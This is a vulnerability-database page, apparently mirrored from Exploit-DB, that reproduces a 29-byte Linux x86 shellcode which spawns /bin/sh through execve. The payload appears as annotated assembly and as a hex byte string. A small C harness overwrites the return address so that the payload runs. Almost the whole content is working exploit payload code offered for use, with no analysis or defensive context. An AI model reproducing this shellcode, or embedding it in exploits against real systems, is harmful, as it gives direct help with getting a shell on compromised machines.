Linux/x86 - execve(/bin/sh) Shellcode (29 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054612 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13443
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* 
  (c)1999-2003 Shellcode Research 
      http://www.shellcode.com.ar

   execve(/bin/sh) for linux x86
   29 bytes
   by Matias Sedalo

        xorl    %ebx, %ebx
        pushl   %ebx
        leal    0x17(%ebx),%eax
        int     $0x80
        cdq
        pushl   $0x68732f6e
        pushl   $0x69622f2f
        movl    %esp, %ebx
        pushl   %eax
        pushl   %ebx
        movl    %esp, %ecx
        movb    $0xb, %al
        int     $0x80
*/


char shellcode[] =
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

main() 
{
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode lenght=%d\n",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-12]